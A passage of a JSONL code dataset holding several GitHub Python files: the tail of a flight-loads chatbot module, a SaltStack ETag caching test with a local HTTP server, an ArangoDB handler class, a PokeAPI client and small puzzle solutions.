response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\\n\"\n if \"Y\" in cabins:\n response_str += \"*Economy Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\"\n response_list.append(response_str)\n return response_list\n else:\n if \"message\" in flight_loads:\n return [\"Sorry. I got this error: \" + flight_loads[\"message\"]]\n return [\"Error handling request.\"]\n except Exception as err:\n import traceback\n\n print(traceback.print_exc())\n print(err)\n\n\ndef format_datetime(date_string):\n return datetime.datetime.strptime(date_string, \"%d%m%yT%H%M\").strftime(\n \"%a %d %b %I:%M%p\"\n )\n\n\ndef get_flight_loads_command(date, flight_num):\n response_list = []\n try:\n access_code = datetime.datetime.now().strftime(\"%A\").lower()\n date = datetime.datetime.strptime(date, \"%Y%m%d\").date().strftime(\"%d%m%y\")\n flight_loads = make_flight_loads_req(date, flight_num, access_code, \"BW\")\n if \"status\" in flight_loads and flight_loads[\"status\"] is True:\n load_list = flight_loads[\"loads\"]\n for each_flight in load_list:\n response_str = f\"{'*'*40}\\n*{each_flight['origin']} -> {each_flight['destination']}*\\n\"\n response_str += (\n f\"*Departure: {format_datetime(each_flight['departure_time'])}*\\n\"\n )\n response_str += (\n f\"*Arrival: {format_datetime(each_flight['arrival_time'])}*\\n\"\n )\n for cabins, values in each_flight[\"cabins\"].items():\n # print(cabins, values)\n if \"J\" in cabins:\n response_str += \"*Business Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\\n\"\n if \"Y\" in cabins:\n response_str += \"*Economy Class*\\n\"\n response_str += f\"Available: {values['available']}\\n\"\n response_str += f\"Booked: {values['booked']}\\n\"\n response_str += f\"Booked Staff: {values['booked_staff']}\\n\"\n response_str += f\"Capacity: {values['capacity']}\\n\"\n response_str += f\"{'*'*40}\\n\"\n response_list.append(response_str)\n return \"\\n\\n\".join(response_list)\n else:\n if \"message\" in flight_loads:\n return \"Sorry. 
I got this error: \" + flight_loads[\"message\"]\n return \"Error handling request.\"\n except Exception as err:\n import traceback\n\n print(traceback.print_exc())\n print(err)\n\n\nif __name__ == \"__main__\":\n test_req = {\n \"queryResult\": {\n \"parameters\": {\n \"date\": \"2018-12-31T12:00:00-05:00\",\n \"flight-number\": \"BW600\",\n }\n }\n }\n\n pprint(get_flight_loads(df_request=test_req))\n","repo_name":"Randy-Ram/Ana","sub_path":"modules/cal/flight_loads.py","file_name":"flight_loads.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12852036564","text":"import functools\nimport hashlib\nimport http.server\nimport multiprocessing\nimport os\nimport random\nimport shutil\nimport socket\nimport sys\nfrom contextlib import closing\n\nimport pytest\n\nimport salt.utils.files\n\n\nclass TestRequestHandler(http.server.SimpleHTTPRequestHandler):\n \"\"\"\n Modified request handler class\n \"\"\"\n\n def __init__(self, *args, directory=None, **kwargs):\n if directory is None:\n directory = os.getcwd()\n self.directory = directory\n if sys.version_info.minor < 7:\n super().__init__(*args, **kwargs)\n else:\n super().__init__(*args, directory=directory, **kwargs)\n\n def do_GET(self):\n \"\"\"\n GET request handling\n \"\"\"\n none_match = self.headers.get(\"If-None-Match\")\n status_code = 200\n try:\n # Retrieve the local file from the web root to serve to clients\n with salt.utils.files.fopen(\n os.path.join(self.directory, self.path[1:]), \"rb\"\n ) as reqfp:\n return_data = reqfp.read()\n # We're using this checksum as the etag to show file changes\n checksum = hashlib.sha256(return_data).hexdigest()\n if none_match == checksum:\n # Status code 304 Not Modified is returned if the file is unchanged\n status_code = 304\n except: # pylint: disable=bare-except\n # Something went wrong. We didn't find the requested file\n status_code = 404\n return_data = None\n checksum = None\n\n self.send_response(status_code)\n\n # Return the Etag header if we have the checksum\n if checksum:\n # IMPORTANT: This introduces randomness into the tests. The Etag header key\n # will be converted to lowercase in the code... but if someone breaks that,\n # it'll rear it's head here as random failures that are hard to reproduce.\n # Any alternatives seem overly complex. So... 
don't break the case insensitivity\n # in the code.\n possible_etags = [\"Etag\", \"ETag\", \"etag\", \"ETAG\"]\n self.send_header(random.choice(possible_etags), checksum)\n self.end_headers()\n\n # Return file content\n if return_data:\n self.wfile.write(return_data)\n\n\ndef serve(port=8000, directory=None):\n \"\"\"\n Function to serve a directory via http.server\n \"\"\"\n handler = functools.partial(TestRequestHandler, directory=directory)\n s = http.server.HTTPServer((\"127.0.0.1\", port), handler)\n s.serve_forever()\n\n\n@pytest.fixture(scope=\"module\")\ndef free_port():\n \"\"\"\n Utility fixture to grab a free port for the web server\n \"\"\"\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n s.bind((\"\", 0))\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n return s.getsockname()[1]\n\n\n@pytest.fixture(autouse=True, scope=\"module\")\ndef server(free_port, web_root):\n \"\"\"\n Web server fixture\n \"\"\"\n p = multiprocessing.Process(target=serve, args=(free_port, web_root))\n p.start()\n yield\n p.terminate()\n p.join()\n\n\n@pytest.fixture(scope=\"module\")\ndef web_root(tmp_path_factory):\n \"\"\"\n Temporary directory fixture for the web server root\n \"\"\"\n _web_root = tmp_path_factory.mktemp(\"web_root\")\n try:\n yield str(_web_root)\n finally:\n shutil.rmtree(str(_web_root), ignore_errors=True)\n\n\n@pytest.mark.slow_test\ndef test_archive_extracted_web_source_etag_operation(\n modules, states, free_port, web_root, minion_opts\n):\n \"\"\"\n This functional test checks the operation of the use_etag parameter to the\n archive.extracted state. There are four (4) invocations of archive.extracted\n with a web source, but only three (3) will trigger a call to the web server\n as shown below and in comments within.\n\n 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 304 -\n 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n\n Checks are documented in the comments.\n \"\"\"\n # Create file in the web root directory to serve\n states.file.managed(\n name=os.path.join(web_root, \"foo\", \"bar.txt\"),\n contents=\"this is my file\",\n makedirs=True,\n )\n modules.archive.tar(\n options=\"czf\",\n tarfile=os.path.join(web_root, \"foo.tar.gz\"),\n sources=[os.path.join(web_root, \"foo\")],\n cwd=web_root,\n )\n\n # File should not be cached yet\n cached_file = os.path.join(\n minion_opts[\"cachedir\"],\n \"extrn_files\",\n \"base\",\n f\"localhost{free_port}\",\n \"foo.tar.gz\",\n )\n cached_etag = cached_file + \".etag\"\n assert not os.path.exists(cached_file)\n assert not os.path.exists(cached_etag)\n\n # Pull the file from the web server\n # Web server returns 200 status code with content:\n # 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=True,\n )\n\n # Now the file is cached\n assert os.path.exists(cached_file)\n assert os.path.exists(cached_etag)\n\n # Store the original modified time of the cached file\n cached_file_mtime = os.path.getmtime(cached_file)\n\n # Pull the file again. Etag hasn't changed. 
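(Salt sends the stored checksum back in an If-None-Match header, so the handler above replies 304 with no body.) 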
No download occurs.\n # Web server returns 304 status code and no content:\n # 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 304 -\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=True,\n )\n\n # Check that the modified time of the cached file hasn't changed\n assert cached_file_mtime == os.path.getmtime(cached_file)\n\n # Change file in the web root directory\n states.file.managed(\n name=os.path.join(web_root, \"foo\", \"bar.txt\"),\n contents=\"this is my changed file\",\n )\n modules.archive.tar(\n options=\"czf\",\n tarfile=os.path.join(web_root, \"foo.tar.gz\"),\n sources=[os.path.join(web_root, \"foo\")],\n cwd=web_root,\n )\n\n # Don't use Etag. Cached file is there, Salt won't try to download.\n # No call to the web server will be made.\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=False,\n )\n\n # Check that the modified time of the cached file hasn't changed\n assert cached_file_mtime == os.path.getmtime(cached_file)\n\n # Now use Etag again. Cached file changes\n # Web server returns 200 status code with content\n # 127.0.0.1 - - [08/Mar/2022 13:07:10] \"GET /foo.tar.gz HTTP/1.1\" 200 -\n states.archive.extracted(\n name=web_root,\n source=f\"http://localhost:{free_port}/foo.tar.gz\",\n archive_format=\"tar\",\n options=\"z\",\n use_etag=True,\n )\n\n # The modified time of the cached file now changes\n assert cached_file_mtime != os.path.getmtime(cached_file)\n","repo_name":"saltstack/salt","sub_path":"tests/pytests/functional/states/test_archive.py","file_name":"test_archive.py","file_ext":"py","file_size_in_byte":7327,"program_lang":"python","lang":"en","doc_type":"code","stars":13606,"dataset":"github-code","pt":"78"}
{"seq_id":"22014351418","text":"from math import *\r\n\r\ndef conv(num, from_sys, to_sys):\r\n num = int(num, from_sys)\r\n if to_sys == 2:\r\n print(bin(num).replace(\"0b\", \"\"))\r\n elif to_sys == 8:\r\n print(oct(num).replace(\"0o\", \"\"))\r\n elif to_sys == 10:\r\n print(num)\r\n elif to_sys == 16:\r\n print(hex(num).replace(\"0x\", \"\"))\r\n return\r\n\r\ndef inp():\r\n ''' 2 - Binary\r\n 8 - Octal\r\n 10 - Decimal\r\n 16 - Hexadecimal'''\r\n num = input(\"Write a number you want to convert: \")\r\n\r\n print(\"\\nWhat number system would you like to convert from?\")\r\n print(inp.__doc__)\r\n from_sys = input()\r\n\r\n print(\"\\nWhat number system would you like to convert to?\")\r\n print(inp.__doc__)\r\n to_sys = input()\r\n conv(num, int(from_sys), int(to_sys))\r\n\r\ndef cont():\r\n inp()\r\n while True:\r\n if input(\"Would you like to continue? 
(y/n): \").lower() == \"y\":\r\n inp()\r\n else:\r\n return\r\n\r\ncont()","repo_name":"slipkova/python_first","sub_path":"01-basics/myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11908941330","text":"\nimport logging\nimport requests\nfrom pyArango.connection import Connection\nfrom polymanager.core.graph_handler import GraphHandler\nimport uuid\nimport json\nfrom tenacity import retry, wait_fixed, stop_after_attempt\n\nclass ArangoDBHandler(GraphHandler):\n\n @retry(wait=wait_fixed(10), stop=stop_after_attempt(18))\n def get_conn(self):\n return Connection(arangoURL=self.url,\n username=self.user, password=self.password, max_retries=10)\n \n def __init__(\n self,\n hostname=\"127.0.0.1\",\n port=\"8529\",\n user=\"root\",\n password=\"\"\n ):\n self._hostname = hostname\n self._port = port\n self.user = user\n self.password = password\n self.url = \"http://{}:{}\".format(self._hostname, self._port)\n self.conn = self.get_conn() \n self._log = logging.getLogger(__name__)\n\n def get_health(self):\n res = requests.get(self.url+\"/_db/_system/_admin/server/availability\", timeout=5)\n return json.loads(res.text)\n\n def create_indexes(self, collection, collection_opts):\n for index in collection_opts[\"indexes\"]:\n index_type = index[\"index_type\"]\n fields = index[\"fields\"]\n name = index[\"name\"]\n if index_type == \"persistent\":\n unique = index_type[\"unique\"] if \"unique\" in index_type else False\n sparse = index_type[\"sparse\"] if \"sparse\" in index_type else True\n deduplicate = index_type[\"deduplicate\"] if \"deduplicate\" in index_type else False\n collection.ensurePersistentIndex(fields, unique=unique, sparse=sparse, deduplicate=deduplicate, name=name)\n elif index_type == \"hash\":\n unique = index_type[\"unique\"] if \"unique\" in index_type else False\n sparse = index_type[\"sparse\"] if \"sparse\" in index_type else True\n deduplicate = index_type[\"deduplicate\"] if \"deduplicate\" in index_type else False\n collection.ensureHashIndex(fields, unique=unique, sparse=sparse, deduplicate=deduplicate, name=name)\n elif index_type == \"fulltext\":\n collection.ensureFulltextIndex(fields, name=name)\n\n def insert_schema(self, schema):\n db_name = schema.get_namespace()\n if not self.conn.hasDatabase(db_name):\n self.conn.createDatabase(db_name)\n self.db = self.conn[db_name]\n collection = None\n collection_opts = schema.get_global_collection_opts()\n if collection_opts:\n if collection_opts[\"edge_collection\"]:\n collection = self.db.createCollection(\"Edges\", name=schema.get_collection_name())\n else:\n collection = self.db.createCollection(name=schema.get_collection_name())\n else:\n collection = self.db.createCollection(name=schema.get_collection_name())\n \n if collection_opts:\n self.create_indexes(collection, collection_opts)\n\n def delete_schema(self, schema):\n db_name = schema.get_namespace()\n self.db = self.conn[db_name]\n collection = self.db[schema.get_collection_name()]\n collection.delete()\n\n \n def drop_all(self):\n for db in self.conn.databases.keys():\n if db == \"_system\":\n continue\n session = requests.Session()\n session.auth = (self.user, self.password)\n session.delete(self.url+\"/_api/database/\"+db)\n\n def add_nodes(self, namespace, collection_name, list_nodes, ref_node):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n ids = []\n for node in list_nodes:\n doc = 
collection.createDocument()\n doc.set(node)\n key = str(uuid.uuid4())\n doc._key = key\n doc.save()\n arangodb_id = \"{}/{}\".format(collection_name, key)\n node = {\"_key\": key, \"_id\": arangodb_id}\n ids.append(node)\n return ids\n\n def add_node(self, namespace, collection_name, node, ref_node):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n doc = collection.createDocument()\n doc.set(node)\n key = str(uuid.uuid4())\n doc._key = key\n doc.save()\n arangodb_id = \"{}/{}\".format(collection_name, key)\n node = {\"_key\": key, \"_id\": arangodb_id}\n return node\n\n def delete_node(self, namespace, collection_name, node_id):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n doc = collection[node_id]\n doc.delete()\n\n def delete_nodes(self, namespace, collection_name, nodes_id):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n for node_id in nodes_id:\n doc = collection[node_id]\n doc.delete()\n\n def get_predicate(self, namespace, collection_name, node_id, predicate):\n self.db = self.conn[namespace]\n res = self.db.AQLQuery(\"\"\"RETURN DOCUMENT(\"{}\", \"{}\")\"\"\".format(collection_name, node_id))\n doc = res.response[\"result\"][0]\n if doc:\n return doc[predicate]\n\n def update_node(self, namespace, collection_name, node_id, node):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n doc = collection[node_id]\n doc.set(node)\n doc.save()\n\n #it is not used for arangodb\n def reset_relationships(self, relationships, node_id):\n pass\n\n def get_edges(self,namespace, collection_name, node_id):\n try :\n self.db = self.conn[namespace]\n query = '''\n FOR e IN `{}`\n FILTER e._from == '{}' || e._to == '{}'\n RETURN e\n '''.format(collection_name, node_id, node_id)\n query_result = self.db.AQLQuery(query, rawResults=True)\n return query_result.response[\"result\"]\n except Exception:\n return None\n\n def has_collection(self, namespace, collection):\n return self.conn[namespace].hasCollection(collection)\n\n def update_relationships(self, namespace, collection_name, relationships):\n try :\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n id_from = \"{}\".format(relationships[\"from\"])\n id_to = \"{}\".format(relationships[\"to\"])\n relationships.pop(\"from\")\n relationships.pop(\"to\")\n edge = collection.fetchFirstExample({\"_to\": id_to, \"_from\": id_from})\n if edge.result:\n id_ = edge.result[0][\"_key\"]\n doc = collection[id_]\n for key in relationships.keys():\n doc[key] = relationships[key]\n doc.save()\n return {\"_key\": doc._key, \"_id\": doc._id}\n _key = str(uuid.uuid4())\n arangodb_id = \"{}/{}\".format(collection_name, _key)\n doc = collection.createEdge()\n doc._key = _key\n doc.links(id_from, id_to)\n for key in relationships.keys():\n doc[key] = relationships[key]\n doc.save()\n return {\"_key\": _key, \"_id\": arangodb_id}\n except Exception as e:\n return None\n \n def delete_relationships(self, namespace, collection_name, edges_id):\n try :\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n for edge_id in edges_id:\n doc = collection[edge_id]\n doc.delete()\n return True\n except Exception as e:\n return False\n\n def truncate(self, namespace, collection_name):\n self.db = self.conn[namespace]\n collection = self.db[collection_name]\n collection.truncate()\n\n def query(self, namespace, query):\n self.db = self.conn[namespace]\n res = self.db.AQLQuery(query)\n return res.response\n\n def node_exists(self, 
namespace, collection_name, node_id):\n self.db = self.conn[namespace]\n res = self.db.AQLQuery(\"\"\"RETURN DOCUMENT(\"{}\", \"{}\")\"\"\".format(collection_name, node_id))\n return res.response","repo_name":"fenix01/polyglot-data-manager","sub_path":"src/polymanager/core/arangodb/arangodb_handler.py","file_name":"arangodb_handler.py","file_ext":"py","file_size_in_byte":8256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
{"seq_id":"2057163190","text":"priority = \"_abcdefghijklmnopqrstuvwxyz\"\n\ndef getFileAsList(filename):\n rList = []\n with open(filename, \"r\") as fileObj:\n for line in fileObj.readlines():\n rList.append(line.strip())\n return rList\n\ndef compareString(string1, string2):\n for char in string1:\n if char in string2:\n return True, char\n return False, \"\"\n\ndef compareString3(string1, string2, string3):\n for char in string1:\n if char in string2 and char in string3:\n return True, char\n return False, \"\"\n\ndef splitHalf(string):\n length = int(len(string)/2)\n return string[:length], string[length:]\n\ndef convertoPriority(char):\n return priority.find(char.lower()) + (26 if char.isupper() else 0)\n\n\nlistOfBackpacks = getFileAsList(\"3rd/data\")\n\nsumPoints = 0\nfor i in range(int(len(listOfBackpacks)/3)):\n backpackTrio = listOfBackpacks[i*3:i*3+3]\n sumPoints += convertoPriority(compareString3(backpackTrio[0], backpackTrio[1], backpackTrio[2])[1])\n\nprint(sumPoints)","repo_name":"ElonDusk26/ADVENT-OF-CODE","sub_path":"3rd/3rd_pt2.py","file_name":"3rd_pt2.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"32127215150","text":"\"\"\"Classes that make requests to Pokemon API endpoints.\"\"\"\nfrom typing import Any\n\nimport requests\nfrom requests.exceptions import JSONDecodeError\n\nfrom pokemon import Pokemon\n\nclass RequestApi():\n \"\"\"Model the general data and functionality to make a request.\n \n Attributes\n ----------\n base_url: str\n The base URL of the API.\n \n Notes\n -----\n At the moment only the GET method is defined, but it is\n possible to define any other.\n \"\"\"\n\n def __init__(self, base_url: str) -> None:\n \"\"\"Initialize the attributes.\n \n Parameters\n ----------\n base_url: str\n The base URL of the API. \n\n Notes\n -----\n The base_url must end in '/'.\n \"\"\"\n self.base_url: str = base_url\n\n def get(self, endpoint_url: str, **kwargs: int) -> requests.Response:\n \"\"\"Get data from a specific endpoint.\"\"\"\n return requests.get(f'{self.base_url}{endpoint_url}', **kwargs)\n\n\nclass PokeApi(RequestApi):\n \"\"\"Request to the PokeApi and process the data.\n\n Attributes\n ----------\n base_url: str\n The base URL of the API. In this case, by default, it is the\n PokeAPI url. \n limit: int\n Indicates the number of resources to get per page. It is a query\n parameter.\n\n Notes\n ----- \n The PokeAPI only accepts GET requests, so it is not necessary to\n write any other. Besides, it is a public API, so it doesn't need\n authentication.\n 
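\n Example (an illustrative sketch, not part of the original module; it\n assumes network access to pokeapi.co):\n\n >>> api = PokeApi(limit=20)\n >>> page = api.get_all_pokemon() # a list of {'name': ..., 'url': ...} dicts\n 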
\"\"\"\n\n def __init__(self, base_url: str = 'https://pokeapi.co/api/v2/', **kwargs: int) -> None:\n \"\"\"Initialize the attributes.\n \n Parameters\n ----------\n base_url: str, optional\n The base URL of the PokeAPI.\n kwargs: dict\n Other parameters to create a request.\n\n Notes\n -----\n The base_url must end in '/'.\n \"\"\"\n super().__init__(base_url)\n self.limit: int = kwargs.get('limit', 10) # By default it is 10\n \n def get_all_pokemon(self) -> list[dict[str, str]]|None:\n \"\"\"Obtain, in only one request, the 'list' of all pokemon.\n\n Returns\n -------\n list[dict[str, str]]\n Contains the name of every pokemon registered.\n \"\"\"\n endpoint_url: str = 'pokemon/'\n params: dict[str, int] = {'limit': self.limit}\n\n response = self.get(endpoint_url, params=params) # type: ignore\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_all_pokemon')\n return json_response['results']\n\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener la lista de todos los pokémons.\")\n\n def json_response(self, response: requests.Response, method_name: str) -> dict[str, Any]:\n \"\"\"Try to convert the response to JSON. In case it isn't\n \n possible, re-raise the JSONDecodeError with a message naming\n the method where it was called.\n \n Parameters\n ----------\n response: requests.Response\n Request response to PokeAPI. Object that can raise\n JSONDecodeError when trying to deserialize it.\n method_name: str\n Name of the method where the exception is raised.\n\n Returns\n -------\n dict[str, Any]\n The content of the response transformed into JSON.\n\n Raises\n ------\n JSONDecodeError\n If the response contains invalid JSON.\n \"\"\"\n try:\n return response.json()\n except JSONDecodeError: \n # json.JSONDecodeError (which requests' JSONDecodeError subclasses) needs (msg, doc, pos)\n raise JSONDecodeError(f\"There was a problem deserializing the request response in '{method_name}'.\", response.text, 0)\n \n\n def get_pokemon(self, id: int = 0, name: str = '') -> Pokemon|None:\n \"\"\"Get the data of a pokemon according to either its id\n \n or name.\n \n Parameters\n ----------\n id: int, optional\n Pokemon's ID to look for.\n name: str, optional\n Pokemon's name to look for.\n\n Returns\n -------\n pokemon: Pokemon\n The instance of a pokemon with id, name, weight, height and\n egg_groups.\n \"\"\"\n endpoint_url: str = 'pokemon-species/'\n weight: float = 0\n height: float = 0\n\n if not id and not name:\n raise AttributeError(f\"A parameter 'id' or 'name' is required.\")\n elif id and name:\n raise AttributeError(f\"Both parameters 'id' and 'name' were provided. Please just input one of them.\")\n \n response: requests.Response = self.get(f'{endpoint_url}{id}/') if id else self.get(f'{endpoint_url}{name}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_pokemon')\n egg_groups: list[dict[str,str]] = json_response['egg_groups']\n weight, height = self.get_weight_height_pokemon(id=id) if id else self.get_weight_height_pokemon(name=name)\n\n return Pokemon(\n id=json_response['id'],\n name=json_response['name'],\n weight=weight,\n height=height,\n egg_groups=egg_groups)\n \n elif id:\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener el pokémon con id: {id}.\")\n else:\n print(f\"Una disculpa. 
Ha ocurrido un error al intentar obtener el pokémon con el nombre: {name}.\")\n\n\n def get_weight_height_pokemon(self, id: int = 0, name: str = '') -> tuple[float, float]:\n \"\"\"Get the weight and height of the pokemon through its id\n\n or name.\n \n Parameters\n ----------\n id: int, optional\n Pokemon's ID to look for.\n name: str, optional\n Pokemon's name to look for.\n\n Returns\n -------\n tuple[float, float]\n A tuple with both values: (weight, height) \n\n Notes\n -----\n The values returned are converted from hectograms to kilograms\n (weight) and from decimeters to meters (height).\n \"\"\"\n endpoint_url: str = 'pokemon/'\n if not id and not name:\n raise AttributeError(f\"A parameter 'id' or 'name' is required.\")\n elif id and name:\n raise AttributeError(f\"Both parameters 'id' and 'name' were provided. Please just input one of them.\")\n\n response: requests.Response = self.get(f'{endpoint_url}{id}/') if id else self.get(f'{endpoint_url}{name}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_weight_height_pokemon')\n weight: float = json_response['weight'] * 0.1 # type: ignore\n height: float = json_response['height'] * 0.1 # type: ignore\n return weight, height\n\n\n def get_spanish_name(self, list_languages_names: list[dict[str, Any]]) -> str|None:\n \"\"\"Search within a list of dicts for the dict which refers to\n \n the Spanish language and get the data of interest.\n\n Parameters\n ----------\n list_languages_names: list[dict[str, Any]]\n List of dicts that contains the data in distinct languages.\n\n Returns\n -------\n str\n The name in Spanish, in case it exists.\n \"\"\"\n for group_name in list_languages_names:\n if group_name['language']['name'] == 'es':\n return group_name['name']\n\n def set_values_dict(self, json_response: dict[str, Any],\n concept_value: str|int, key_word: str) -> tuple[str|int, list[dict[str, Any]]]:\n \"\"\"Set the name of the concept being treated and a list of \n \n dictionaries with the values of interest (key). 
Both values\n are returned.\n\n Parameters\n ----------\n json_response: dict[str, Any]\n The content of a response transformed to JSON.\n concept_value: str|int\n In case it isn't possible to get the name in Spanish, the\n concept value will work as the name.\n key_word: str\n Indicates the key to search inside the json response.\n\n Returns\n -------\n tuple[str|int, list[dict[str, Any]]]\n Name of the concept and the list of dictionaries with\n the values searched.\n\n Notes\n -----\n Most of the time the 'key' is about pokemon; that's the\n reason the variables are named 'pokemon_something'.\n \"\"\"\n concept_languages_names: list[dict[str, Any]] = json_response['names']\n concept_name: str|int = self.get_spanish_name(concept_languages_names) or concept_value\n return (concept_name, json_response[key_word])\n\n def get_egg_group_species(self, pokemon: Pokemon) -> dict[str, list]|None:\n \"\"\"Get the species that belong to the same egg group.\n \n The species in the group are able to breed with the pokemon.\n\n Parameters\n -----------\n pokemon: Pokemon\n The instance of a pokemon with id, name and egg_groups.\n\n Returns\n -------\n egg_group_species: dict[str, list]\n A dictionary where the keys are the egg groups' names and\n the values are lists which contain the species belonging to\n the egg group.\n \"\"\"\n endpoint_url: str = 'egg-group/'\n egg_group_species: dict[str, list] = {}\n egg_groups: list[dict[str, str]] = pokemon.egg_groups\n\n for egg_group in egg_groups:\n name = egg_group['name']\n response: requests.Response = self.get(f'{endpoint_url}{name}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'get_egg_group_species')\n egg_group_name, species_list = self.set_values_dict(json_response, name, 'pokemon_species')\n # Add data to egg_group_species\n egg_group_species.setdefault(str(egg_group_name), species_list)\n else:\n print(f\"Una disculpa. Ha ocurrido un error al intentar obtener el grupo de huevo '{name}'.\")\n return None\n\n return egg_group_species\n\n def list_pokemon_by_type(self, type: str = '') -> dict[str, list]|None:\n \"\"\"Retrieve the names of all pokemon belonging to\n \n the type.\n\n Parameters\n ----------\n type: str, optional\n Name of the type whose pokemon to search for.\n\n Returns\n --------\n pokemons_of_type: dict[str, list]\n The key is the name of the type (in Spanish where possible)\n and the value is a list with the name of all pokemons of\n the type.\n \"\"\"\n endpoint_url: str = 'type/'\n pokemons_of_type: dict[str, list] = {}\n if not type:\n raise AttributeError(f\"The 'type' parameter is required.\")\n \n response = self.get(f'{endpoint_url}{type}/')\n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'list_pokemon_by_type')\n type_name, pokemon_dd_list = self.set_values_dict(json_response, type, 'pokemon') # dd refers to dict_dict\n pokemon_dict_list: list[dict[str, str]] = [pokemon['pokemon'] for pokemon in pokemon_dd_list]\n \n # Add the data to the dict\n pokemons_of_type.setdefault(str(type_name), pokemon_dict_list)\n return pokemons_of_type\n\n print(f\"Una disculpa. Ha ocurrido un error al generar la lista de los pokémons de tipo '{type}'.\")\n\n def list_pokemon_generation(self, generation_number: int = 1) -> dict[str, list]|None:\n \"\"\"Generate a list with the names of each pokemon of that\n \n specific generation.\n\n Parameters\n ----------\n generation_number: int, optional\n Generation number. 
It cannot be greater than 8.\n\n Returns\n -------\n pokemons_of_generation: dict[str, list]\n The key is the name of the generation, in Spanish if possible,\n and the value is the list with the names.\n \"\"\"\n endpoint_url: str = 'generation/'\n pokemons_of_generation: dict[str, list] = {}\n\n if generation_number < 1 or generation_number > 8:\n print(f\"El número de la generación solo puede estar entre 1 y 8. El '{generation_number}' no es valido.\")\n return None\n response = self.get(f'{endpoint_url}{generation_number}/')\n \n if response.status_code == 200:\n json_response: dict[str, Any] = self.json_response(response, 'list_pokemon_generation')\n generation_name, pokemon_list = self.set_values_dict(json_response, generation_number, 'pokemon_species')\n pokemons_of_generation.setdefault(str(generation_name), pokemon_list)\n return pokemons_of_generation\n \n print(\n f\"Una disculpa. Ha ocurrido un error al generar la lista de los pokémons de la \"\n f\"generación '{generation_number}'.\")\n\n","repo_name":"Jony-softdeveloper/Questions_PokeAPI","sub_path":"src/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":13252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"40067858432","text":"# https://www.acmicpc.net/problem/4963 Problem title: The Number of Islands, Language: Python, Date: 2020-03-30, Result: Success\n\"\"\"\n Retrospective:\n Just mark each new island whenever you run into one.\n From now on I should try problems that aren't gold tier too. Gold problems are way too hard..\n\"\"\"\n\nimport sys\nfrom collections import deque\n\ndef bfs(x,y,w,h):\n list_queue = deque()\n list_queue.append([x,y])\n while list_queue:\n now_x, now_y = list_queue.popleft()\n for i in range(8):\n nx = now_x + dx[i]\n ny = now_y + dy[i]\n if 0 <= nx < w and 0 <= ny < h:\n if list_map[ny][nx] == 1 and not list_visit[ny][nx]:\n list_visit[ny][nx] = 1\n list_queue.append([nx,ny])\n\n\ndx = [1,1,1,0,-1,-1,-1,0]\ndy = [1,0,-1,-1,-1,0,1,1]\nwhile True:\n w, h = map(int, sys.stdin.readline().split())\n if w == 0 and h == 0:\n break\n list_map = [list(map(int, sys.stdin.readline().split())) for _ in range(h)]\n list_visit = [[0]*w for _ in range(h)]\n count = 0\n for y in range(h):\n for x in range(w):\n if list_map[y][x] == 1 and not list_visit[y][x]:\n count+=1\n bfs(x,y,w,h)\n print(count)\n","repo_name":"SpicyKong/problems","sub_path":"BOJ/Q_4963.py","file_name":"Q_4963.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
